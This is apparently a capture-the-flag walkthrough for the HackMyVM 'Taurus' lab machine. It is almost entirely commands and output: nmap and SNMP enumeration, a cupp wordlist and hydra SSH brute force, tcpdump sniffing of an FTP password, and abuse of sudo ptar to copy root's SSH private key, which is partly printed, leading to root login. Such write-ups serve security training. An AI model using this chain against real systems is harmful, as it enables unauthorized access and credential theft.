Keypoints: generate custom dic, tcpdump, IPv6
https://hackmyvm.eu/machines/machine.php?vm=Taurus
nmap -sV -sC -p- -Pn -oN ports.log 192.168.56.100
Nmap scan report for deathnote.vuln (192.168.56.100)
Host is up (0.00082s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
21/tcp filtered ftp
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 9e:f1:ed:84:cc:41:8c:7e:c6:92:a9:b4:29:57:bf:d1 (RSA)
| 256 9f:f3:93:db:72:ff:cd:4d:5f:09:3e:dc:13:36:49:23 (ECDSA)
|_ 256 e7:a3:72:dd:d5:af:e2:b5:77:50:ab:3d:27:12:0f:ea (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Scan udp ports, we found snmp port is open.
nmap -sU --top-ports 200 -oN udp_ports.log 192.168.56.100
Nmap scan report for deathnote.vuln (192.168.56.100)
Host is up (0.00089s latency).
Not shown: 198 closed ports
PORT STATE SERVICE
68/udp open|filtered dhcpc
161/udp open|filtered snmp
Use snmpwalk to get info from port 161, now we know the name sarah.
~ snmpwalk -v 1 -c public 192.168.56.100
iso.3.6.1.2.1.1.1.0 = STRING: "Linux taurus 5.10.0-9-amd64 #1 SMP Debian 5.10.70-1 (2021-09-30) x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (1183326) 3:17:13.26
iso.3.6.1.2.1.1.4.0 = STRING: "Sarah <sarah@hmv.org>"
iso.3.6.1.2.1.1.5.0 = STRING: "\"I Love My Name, Don't You, Little Hackers ?\""
iso.3.6.1.2.1.1.6.0 = STRING: "Unknown"
iso.3.6.1.2.1.1.8.0 = Timeticks: (1) 0:00:00.01
...
Here is the tricky part. In order to brute force ssh password of sarah, we need a password dic, which can be generated by cupp. First name is sarah, the rest part input nothing.
~ cupp -i
___________
cupp.py! # Common
\ # User
\ ,__, # Passwords
\ (oo)____ # Profiler
(__) )\
||--|| * [ Muris Kurgas | j0rgan@remote-exploit.org ]
[ Mebus | https://github.com/Mebus/]
[+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)
> First Name: sarah
> Surname:
> Nickname:
> Birthdate (DDMMYYYY):
...
Successfully get the password of sarah.
~ hydra -l sarah -P sarah.txt -e nsr 192.168.56.100 ssh -t64 -F
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-10-21 11:34:10
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 64 tasks per 1 server, overall 64 tasks, 111 login tries (l:1/p:111), ~2 tries per task
[DATA] attacking ssh://192.168.56.100:22/
[22][ssh] host: 192.168.56.100 login: sarah password: Sarah_2012
[STATUS] attack finished for 192.168.56.100 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-10-21 11:34:26
In sarah's home folder, found a file default.tar, which is unreadable now.
sarah@taurus:~$ ls -la
total 32
drwx------ 2 sarah sarah 4096 Oct 20 17:14 .
drwxr-xr-x 4 root root 4096 Oct 16 19:17 ..
lrwxrwxrwx 1 root root 9 Oct 16 19:56 .bash_history -> /dev/null
-rw-r--r-- 1 sarah sarah 220 Oct 16 08:53 .bash_logout
-rw-r--r-- 1 sarah sarah 3526 Oct 16 08:53 .bashrc
-rw-r--r-- 1 root root 4608 Oct 20 17:09 default.tar
-rw-r--r-- 1 sarah sarah 807 Oct 16 08:53 .profile
-rw------- 1 sarah sarah 104 Oct 20 17:14 .Xauthority
Check sudo -l of user.
sarah@taurus:~$ sudo -l
Matching Defaults entries for sarah on taurus:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User sarah may run the following commands on taurus:
(marion : marion) NOPASSWD: /usr/bin/bash /opt/ftp
Try to run it. The ftp port opened and closed again quickly.
sarah@taurus:~$ sudo -u marion /usr/bin/bash /opt/ftp
ftp connection opened.
ftp connection closed.
Open another ssh terminal, run tcpdump to get data.
sarah@taurus:~$ tcpdump -i lo -nn -A
...
17:03:43.659795 IP6 ::1.21 > ::1.34582: Flags [P.], seq 36:70, ack 14, win 512, options [nop,nop,TS val 3615192936 ecr 3
615192936], length 34: FTP: 331 Password required for marion
`....B.@.....................................H*9.........J.....
.{wh.{wh331 Password required for marion
17:03:43.659802 IP6 ::1.34582 > ::1.21: Flags [.], ack 70, win 512, options [nop,nop,TS val 3615192936 ecr 3615192936],
length 0
`.EX. .@.........................................H*[.....(.....
.{wh.{wh
17:03:43.659819 IP6 ::1.34582 > ::1.21: Flags [P.], seq 14:32, ack 70, win 512, options [nop,nop,TS val 3615192936 ecr 3
615192936], length 18: FTP: PASS ilovesushis
...
Escalate to user marion, check sudo -l again.
sarah@taurus:~$ su marion
Password:
marion@taurus:/home/sarah$ sudo -l
Matching Defaults entries for marion on taurus:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User marion may run the following commands on taurus:
(ALL : ALL) NOPASSWD: /usr/bin/ptar
Use ptar to pack /root/ to /tmp/, then extract it use tar.
marion@taurus:/tmp$ sudo /usr/bin/ptar -cvf root.tar /root/
/root
/root/.bashrc
/root/root.txt
/root/.profile
/root/.bash_history
/root/.local
/root/.local/share
/root/.local/share/nano
/root/.ssh
/root/.ssh/authorized_keys
/root/.ssh/id_rsa
marion@taurus:/tmp$ tar -xvf root.tar -C ./
tar: Removing leading `//' from member names
//root
tar: Removing leading `/' from member names
/root/.bashrc
/root/root.txt
/root/.profile
/root/.bash_history
/root/.local
/root/.local/share
/root/.local/share/nano
/root/.ssh
/root/.ssh/authorized_keys
/root/.ssh/id_rsa
marion@taurus:/tmp$ cat ./root/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAuhCb4PqUqWAgQROGlOfqHiE9bBbe+bavDZjpFidqVJYxX5Jm9Mv/
e0R4R/1zwXxz0JdPAMZUOS8W9oiuc3TQ+seOp6vWKdLRd98bDycruGpbgMzHF0kULDeCN
...
Get root with ssh.
marion@taurus:/tmp$ ssh root@localhost -i root/.ssh/id_rsa
Linux taurus 5.10.0-9-amd64 #1 SMP Debian 5.10.70-1 (2021-09-30) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Oct 16 21:20:06 2021
root@taurus:~# id;hostname
uid=0(root) gid=0(root) groups=0(root)
taurus
